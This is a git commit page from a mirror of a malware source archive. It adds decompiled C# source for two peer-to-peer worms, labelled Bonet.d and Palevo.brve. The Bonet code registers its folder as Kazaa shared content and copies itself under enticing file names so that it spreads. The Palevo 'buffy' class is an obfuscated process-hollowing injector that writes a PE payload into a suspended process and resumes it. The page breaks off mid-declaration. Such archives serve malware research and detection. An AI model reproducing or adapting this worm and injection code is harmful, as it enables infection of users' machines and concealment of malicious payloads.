daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-16 15:59:24 +00:00
Code Issues Projects Releases Wiki Activity

auto-decompiled msil via petikvx

Browse Source 
add
This commit is contained in:
vxunderground
2022-08-18 06:28:56 -05:00
parent 26192f771b
commit f2ac1ece55
12767 changed files with 1945075 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSIL/P2P-Worm/Win32/B/P2P-Worm.Win32.Bonet.d-5e8e645f7b36d24b9942dfc3778a10713b8a0433b2812cd9b53a8f7b2e18dc43/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/P2P-Worm/Win32/B/P2P-Worm.Win32.Bonet.d-5e8e645f7b36d24b9942dfc3778a10713b8a0433b2812cd9b53a8f7b2e18dc43/P2P-Worm.Win32.Bonet.d.csproj
+36
View File
@@ -0,0 +1,36 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Bonet.d-5e8e645f7b36d24b9942dfc3778a10713b8a0433b2812cd9b53a8f7b2e18dc43.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{2DED1228-0E06-4639-A368-530E278D35A6}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>p2p</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Compile Include="p2pdotnet.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/P2P-Worm/Win32/B/P2P-Worm.Win32.Bonet.d-5e8e645f7b36d24b9942dfc3778a10713b8a0433b2812cd9b53a8f7b2e18dc43/P2P-Worm.Win32.Bonet.d.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "p2p", "P2P-Worm.Win32.Bonet.d-5e8e645f7b36d24b9942dfc3778a10713b8a0433b2812cd9b53a8f7b2e18dc43.csproj", "{2DED1228-0E06-4639-A368-530E278D35A6}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{2DED1228-0E06-4639-A368-530E278D35A6}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{2DED1228-0E06-4639-A368-530E278D35A6}.Debug|Any CPU.Build.0 = Debug|Any CPU
{2DED1228-0E06-4639-A368-530E278D35A6}.Release|Any CPU.ActiveCfg = Release|Any CPU
{2DED1228-0E06-4639-A368-530E278D35A6}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/P2P-Worm/Win32/B/P2P-Worm.Win32.Bonet.d-5e8e645f7b36d24b9942dfc3778a10713b8a0433b2812cd9b53a8f7b2e18dc43/p2pdotnet.cs
+39
View File
@@ -0,0 +1,39 @@
// Decompiled with JetBrains decompiler
// Type: p2pdotnet
// Assembly: p2p, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9E3614D0-FB94-4D7E-AEE9-6FE0A654E1F0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Bonet.d-5e8e645f7b36d24b9942dfc3778a10713b8a0433b2812cd9b53a8f7b2e18dc43.exe
using Microsoft.Win32;
using System.IO;
using System.Reflection;
internal class p2pdotnet
{
public static void Main()
{
Registry.CurrentUser.OpenSubKey("Software\\Kazaa\\LocalContent", true).SetValue("Dir0", (object) ("012345:" + Directory.GetCurrentDirectory()));
Module module = Assembly.GetExecutingAssembly().GetModules()[0];
string[] strArray = new string[8]
{
"dotnethack.exe",
"xboxdotnetemulator.exe",
"linuxdotnet.exe",
"dosdotnet.exe",
"microsoftdotnetpatch.exe",
"sha1.exe",
"tripleDES.exe",
"c#tutorials.exe"
};
foreach (string destFileName in strArray)
{
try
{
File.Copy(module.FullyQualifiedName, destFileName);
}
catch
{
}
}
}
}
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a/MyApplication.cs
+18
View File
@@ -0,0 +1,18 @@
// Decompiled with JetBrains decompiler
// Type: My.MyApplication
// Assembly: 999, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: DDB616DB-EBCF-4697-A5E1-16ED844B55D4
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a.exe
using Microsoft.VisualBasic.ApplicationServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
namespace My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyApplication : ApplicationBase
{
}
}
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a/MyComputer.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: My.MyComputer
// Assembly: 999, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: DDB616DB-EBCF-4697-A5E1-16ED844B55D4
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace My
{
[GeneratedCode("MyTemplate", "8.0.0.0")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal class MyComputer : Computer
{
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyComputer()
{
}
}
}
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a/MyProject.cs
+108
View File
@@ -0,0 +1,108 @@
// Decompiled with JetBrains decompiler
// Type: My.MyProject
// Assembly: 999, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: DDB616DB-EBCF-4697-A5E1-16ED844B55D4
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
namespace My
{
[HideModuleName]
[GeneratedCode("MyTemplate", "8.0.0.0")]
[StandardModule]
internal sealed class MyProject
{
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
[HelpKeyword("My.Computer")]
internal static MyComputer Computer
{
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
}
[HelpKeyword("My.Application")]
internal static MyApplication Application
{
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
}
[HelpKeyword("My.User")]
internal static User User
{
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
}
[HelpKeyword("My.WebServices")]
internal static MyProject.MyWebServices WebServices
{
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
}
[EditorBrowsable(EditorBrowsableState.Never)]
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
internal sealed class MyWebServices
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
internal new Type GetType() => typeof (MyProject.MyWebServices);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyWebServices()
{
}
}
[ComVisible(false)]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class ThreadSafeObjectProvider<T> where T : new()
{
internal T GetInstance
{
[DebuggerHidden] get
{
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
}
}
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public ThreadSafeObjectProvider()
{
}
}
}
}
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a/P2P-Worm.Win32.Palevo.brve.csproj
+46
View File
@@ -0,0 +1,46 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{CBDB14DB-5693-4988-AC9E-6C0F682563D1}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>999</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>My</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="pizde.cs" />
<Compile Include="buffy.cs" />
<Compile Include="MyApplication.cs" />
<Compile Include="MyComputer.cs" />
<Compile Include="MyProject.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a/P2P-Worm.Win32.Palevo.brve.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "999", "P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a.csproj", "{CBDB14DB-5693-4988-AC9E-6C0F682563D1}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{CBDB14DB-5693-4988-AC9E-6C0F682563D1}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{CBDB14DB-5693-4988-AC9E-6C0F682563D1}.Debug|Any CPU.Build.0 = Debug|Any CPU
{CBDB14DB-5693-4988-AC9E-6C0F682563D1}.Release|Any CPU.ActiveCfg = Release|Any CPU
{CBDB14DB-5693-4988-AC9E-6C0F682563D1}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a/buffy.cs
+632
View File
@@ -0,0 +1,632 @@
// Decompiled with JetBrains decompiler
// Type: buffy
// Assembly: 999, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: DDB616DB-EBCF-4697-A5E1-16ED844B55D4
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
public class buffy
{
public const long ASDFASFASF = 2778;
public const long FASFASFASF = 60116;
public const long AFSFASFASCFC = 218;
public const long ASDASCASDASD = 218;
public const long BVCXBXCBXCB = 218;
public const long BXCBXCBXCB = 253;
public const long FSDR3FSF = 218;
public const long KKKKKKKKKDDDDDDD = 17247;
public const uint FSSSSSSSSSSSSSSSSSS = 218;
public static void mickey(byte[] DAS4DA3, string VVVVVVCAE)
{
object Instance1 = (object) new buffy.Context();
object obj1 = (object) new buffy.Process_Information();
object obj2 = (object) new buffy.Startup_Information();
object obj3 = (object) new buffy.Security_Flags();
object obj4 = (object) new buffy.Security_Flags();
object Instance2 = (object) GCHandle.Alloc((object) DAS4DA3, GCHandleType.Pinned);
int integer1 = Conversions.ToInteger(NewLateBinding.LateGet(NewLateBinding.LateGet(Instance2, (Type) null, "AddrOfPinnedObject", new object[0], (string[]) null, (Type[]) null, (bool[]) null), (Type) null, "ToInt32", new object[0], (string[]) null, (Type[]) null, (bool[]) null));
buffy.DOS_Header dosHeader1 = new buffy.DOS_Header();
Type Type = typeof (Marshal);
object[] objArray1 = new object[2];
object[] objArray2 = objArray1;
object Instance3 = Instance2;
object objectValue = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(Instance3, (Type) null, "AddrOfPinnedObject", new object[0], (string[]) null, (Type[]) null, (bool[]) null));
objArray2[0] = objectValue;
objArray1[1] = (object) dosHeader1.GetType();
object[] objArray3 = objArray1;
object[] Arguments = objArray3;
bool[] flagArray = new bool[2]{ true, false };
bool[] CopyBack = flagArray;
object obj5 = NewLateBinding.LateGet((object) null, Type, "PtrToStructure", Arguments, (string[]) null, (Type[]) null, CopyBack);
if (flagArray[0])
NewLateBinding.LateSetComplex(Instance3, (Type) null, "AddrOfPinnedObject", new object[1]
{
RuntimeHelpers.GetObjectValue(objArray3[0])
}, (string[]) null, (Type[]) null, true, false);
buffy.DOS_Header dosHeader2;
buffy.DOS_Header dosHeader3 = obj5 != null ? (buffy.DOS_Header) obj5 : dosHeader2;
NewLateBinding.LateCall(Instance2, (Type) null, "Free", new object[0], (string[]) null, (Type[]) null, (bool[]) null, true);
buffy.GN04L0ER8I gn04L0Er8I1 = buffy.TXXY5U8D2U<buffy.GN04L0ER8I>("kernel32", "CreateProcessA");
buffy.R84OY4NT36 r84Oy4Nt36_1 = buffy.TXXY5U8D2U<buffy.R84OY4NT36>("kernel32", "GetThreadContext");
buffy.Q7QRRP639W q7QrrP639W1 = buffy.TXXY5U8D2U<buffy.Q7QRRP639W>("kernel32", "ReadProcessMemory");
buffy.ZGOQ8VM05M zgoQ8Vm05M1 = buffy.TXXY5U8D2U<buffy.ZGOQ8VM05M>("kernel32", "WriteProcessMemory");
buffy.EFVI2YI66B efvI2Yi66B1 = buffy.TXXY5U8D2U<buffy.EFVI2YI66B>("ntdll", "ZwUnmapViewOfSection");
buffy.W6CTR6GLCC w6CtR6Glcc1 = buffy.TXXY5U8D2U<buffy.W6CTR6GLCC>("kernel32", "VirtualAllocEx");
buffy.K7B3INYH01 k7B3InyH01_1 = buffy.TXXY5U8D2U<buffy.K7B3INYH01>("kernel32", "SetThreadContext");
buffy.WS2XVBNVO9 ws2XvbnvO9_1 = buffy.TXXY5U8D2U<buffy.WS2XVBNVO9>("kernel32", "ResumeThread");
buffy.GN04L0ER8I gn04L0Er8I2 = gn04L0Er8I1;
string DASDAS3E2_1 = VVVVVVCAE;
object obj6 = obj3;
buffy.Security_Flags securityFlags1;
buffy.Security_Flags securityFlags2 = obj6 != null ? (buffy.Security_Flags) obj6 : securityFlags1;
ref buffy.Security_Flags local1 = ref securityFlags2;
object obj7 = obj4;
buffy.Security_Flags securityFlags3 = obj7 != null ? (buffy.Security_Flags) obj7 : securityFlags1;
ref buffy.Security_Flags local2 = ref securityFlags3;
IntPtr num1;
IntPtr DSA43R3W1 = num1;
object obj8 = obj2;
buffy.Startup_Information startupInformation1;
buffy.Startup_Information startupInformation2 = obj8 != null ? (buffy.Startup_Information) obj8 : startupInformation1;
ref buffy.Startup_Information local3 = ref startupInformation2;
object obj9 = obj1;
buffy.Process_Information processInformation1;
buffy.Process_Information processInformation2 = obj9 != null ? (buffy.Process_Information) obj9 : processInformation1;
ref buffy.Process_Information local4 = ref processInformation2;
int num2 = gn04L0Er8I2((string) null, DASDAS3E2_1, ref local1, ref local2, false, 4U, DSA43R3W1, (string) null, ref local3, out local4) ? 1 : 0;
object obj10 = (object) processInformation2;
object Instance4 = (object) startupInformation2;
object obj11 = (object) securityFlags3;
object obj12 = (object) securityFlags2;
if (-((uint) num2 > 0U ? 1 : 0) == 0)
return;
buffy.NT_Headers ntHeaders1 = new buffy.NT_Headers();
IntPtr ptr = new IntPtr(checked (integer1 + dosHeader3.DASE3ASDAS));
object structure1 = Marshal.PtrToStructure(ptr, ntHeaders1.GetType());
buffy.NT_Headers ntHeaders2;
buffy.NT_Headers ntHeaders3 = structure1 != null ? (buffy.NT_Headers) structure1 : ntHeaders2;
NewLateBinding.LateSet(Instance4, (Type) null, "CSZE", new object[1]
{
(object) Strings.Len(RuntimeHelpers.GetObjectValue(Instance4))
}, (string[]) null, (Type[]) null);
NewLateBinding.LateSet(Instance1, (Type) null, "II69TOHMUR", new object[1]
{
(object) 65539
}, (string[]) null, (Type[]) null);
if (ntHeaders3.SSSSSSSSSSSQ != 17744U | dosHeader3.DASDASFASF != (ushort) 23117)
return;
buffy.GN04L0ER8I gn04L0Er8I3 = gn04L0Er8I1;
string DASDAS3E2_2 = VVVVVVCAE;
object obj13 = obj12;
securityFlags2 = obj13 != null ? (buffy.Security_Flags) obj13 : securityFlags1;
ref buffy.Security_Flags local5 = ref securityFlags2;
object obj14 = obj11;
securityFlags3 = obj14 != null ? (buffy.Security_Flags) obj14 : securityFlags1;
ref buffy.Security_Flags local6 = ref securityFlags3;
IntPtr DSA43R3W2 = num1;
object obj15 = Instance4;
startupInformation2 = obj15 != null ? (buffy.Startup_Information) obj15 : startupInformation1;
ref buffy.Startup_Information local7 = ref startupInformation2;
object obj16 = obj10;
processInformation2 = obj16 != null ? (buffy.Process_Information) obj16 : processInformation1;
ref buffy.Process_Information local8 = ref processInformation2;
int num3 = gn04L0Er8I3((string) null, DASDAS3E2_2, ref local5, ref local6, false, 4U, DSA43R3W2, (string) null, ref local7, out local8) ? 1 : 0;
object Instance5 = (object) processInformation2;
object obj17 = (object) startupInformation2;
object obj18 = (object) securityFlags3;
object obj19 = (object) securityFlags2;
if (-((uint) num3 > 0U ? 1 : 0) == 0)
return;
buffy.R84OY4NT36 r84Oy4Nt36_2 = r84Oy4Nt36_1;
object obj20 = NewLateBinding.LateGet(Instance5, (Type) null, "RFSER", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASDASC = obj20 != null ? (IntPtr) obj20 : num1;
object obj21 = Instance1;
buffy.Context context1;
buffy.Context context2 = obj21 != null ? (buffy.Context) obj21 : context1;
ref buffy.Context local9 = ref context2;
int num4 = r84Oy4Nt36_2(DASDASC, ref local9) ? 1 : 0;
object Instance6 = (object) context2;
buffy.Q7QRRP639W q7QrrP639W2 = q7QrrP639W1;
object obj22 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr FASFDASDAS = obj22 != null ? (IntPtr) obj22 : num1;
int integer2 = Conversions.ToInteger(Operators.AddObject(NewLateBinding.LateGet(Instance6, (Type) null, "WDA", new object[0], (string[]) null, (Type[]) null, (bool[]) null), (object) 8));
long num5;
int num6 = checked ((int) num5);
ref int local10 = ref num6;
int num7 = 0;
ref int local11 = ref num7;
int num8 = q7QrrP639W2(FASFDASDAS, integer2, ref local10, 4, ref local11);
long num9 = (long) num6;
buffy.EFVI2YI66B efvI2Yi66B2 = efvI2Yi66B1;
object obj23 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASE3 = obj23 != null ? (IntPtr) obj23 : num1;
int AL8ZCRFWNU1 = checked ((int) num9);
long num10 = efvI2Yi66B2(DASE3, AL8ZCRFWNU1);
buffy.W6CTR6GLCC w6CtR6Glcc2 = w6CtR6Glcc1;
object obj24 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASE43E = obj24 != null ? (IntPtr) obj24 : num1;
int dfazdasd = checked ((int) ntHeaders3.OOOU.DFAZDASD);
int dasrdasrasr = (int) ntHeaders3.OOOU.DASRDASRASR;
uint num11 = checked ((uint) (int) w6CtR6Glcc2(DASE43E, dfazdasd, (uint) dasrdasrasr, 12288U, 4U));
if (num11 == 0U)
return;
buffy.ZGOQ8VM05M zgoQ8Vm05M2 = zgoQ8Vm05M1;
object obj25 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASE32_1 = obj25 != null ? (IntPtr) obj25 : num1;
int AL8ZCRFWNU2 = checked ((int) num11);
byte[] DSAE32_1 = DAS4DA3;
int wqdasdasd = checked ((int) ntHeaders3.OOOU.WQDASDASD);
uint num12;
int num13 = checked ((int) num12);
ref int local12 = ref num13;
int num14 = zgoQ8Vm05M2(DASE32_1, AL8ZCRFWNU2, DSAE32_1, wqdasdasd, out local12) ? 1 : 0;
uint num15 = checked ((uint) num13);
long num16 = (long) checked (dosHeader3.DASE3ASDAS + 248);
int num17 = checked ((int) ntHeaders3.DSEEEEE.DAAAAAAAA3 - 1);
int num18 = 0;
while (num18 <= num17)
{
ptr = new IntPtr(checked ((long) integer1 + num16 + (long) (num18 * 40)));
buffy.Section_Header sectionHeader1;
object structure2 = Marshal.PtrToStructure(ptr, sectionHeader1.GetType());
buffy.Section_Header sectionHeader2;
sectionHeader1 = structure2 != null ? (buffy.Section_Header) structure2 : sectionHeader2;
byte[] numArray = new byte[checked ((int) sectionHeader1.DA22S3 + 1)];
int num19 = checked ((int) ((long) sectionHeader1.DA22S3 - 1L));
int index = 0;
while (index <= num19)
{
numArray[index] = DAS4DA3[checked ((int) ((long) sectionHeader1.PoinEEter + (long) index))];
checked { ++index; }
}
buffy.ZGOQ8VM05M zgoQ8Vm05M3 = zgoQ8Vm05M1;
object obj26 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASE32_2 = obj26 != null ? (IntPtr) obj26 : num1;
int AL8ZCRFWNU3 = checked ((int) (num11 + sectionHeader1.AL8ZCRFWNU));
byte[] DSAE32_2 = numArray;
int da22S3 = checked ((int) sectionHeader1.DA22S3);
int num20 = checked ((int) num15);
ref int local13 = ref num20;
int num21 = zgoQ8Vm05M3(DASE32_2, AL8ZCRFWNU3, DSAE32_2, da22S3, out local13) ? 1 : 0;
num15 = checked ((uint) num20);
checked { ++num18; }
}
object bytes = (object) BitConverter.GetBytes(num11);
buffy.ZGOQ8VM05M zgoQ8Vm05M4 = zgoQ8Vm05M1;
object obj27 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASE32_3 = obj27 != null ? (IntPtr) obj27 : num1;
int integer3 = Conversions.ToInteger(Operators.AddObject(NewLateBinding.LateGet(Instance6, (Type) null, "WDA", new object[0], (string[]) null, (Type[]) null, (bool[]) null), (object) 8));
byte[] DSAE32_3 = (byte[]) bytes;
int num22 = checked ((int) num15);
ref int local14 = ref num22;
int num23 = zgoQ8Vm05M4(DASE32_3, integer3, DSAE32_3, 4, out local14) ? 1 : 0;
num12 = checked ((uint) num22);
NewLateBinding.LateSet(Instance6, (Type) null, "AS4", new object[1]
{
(object) checked (num11 + ntHeaders3.OOOU.DDDDDDDDAAA)
}, (string[]) null, (Type[]) null);
buffy.K7B3INYH01 k7B3InyH01_2 = k7B3InyH01_1;
object obj28 = NewLateBinding.LateGet(Instance5, (Type) null, "RFSER", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr ASDASCASDASD = obj28 != null ? (IntPtr) obj28 : num1;
object obj29 = Instance6;
context2 = obj29 != null ? (buffy.Context) obj29 : context1;
ref buffy.Context local15 = ref context2;
int num24 = k7B3InyH01_2(ASDASCASDASD, ref local15) ? 1 : 0;
object obj30 = (object) context2;
buffy.WS2XVBNVO9 ws2XvbnvO9_2 = ws2XvbnvO9_1;
object obj31 = NewLateBinding.LateGet(Instance5, (Type) null, "RFSER", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASEAS = obj31 != null ? (IntPtr) obj31 : num1;
int num25 = (int) ws2XvbnvO9_2(DASEAS);
}
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string tr6);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr GetProcAddress(IntPtr gdr54, [MarshalAs(UnmanagedType.VBByRefStr)] ref string gfsd54);
[DllImport("rpcns4.dll", EntryPoint = "RpcNsProfileEltAddA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long RpcNsProfileEltAdd(
long ProfileNameSyntax,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string ProfileName,
ref IntPtr IfId,
long MemberNameSyntax,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string MemberName,
long Priority,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string Annotation);
[DllImport("wldap32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ldap_close_extended_op(ref IntPtr ld, long MessageNumber);
[DllImport("tapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long lineSetAppSpecific(long hCall, long dwAppSpecific);
[DllImport("rtm.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long MgmGetNextMfeStats(
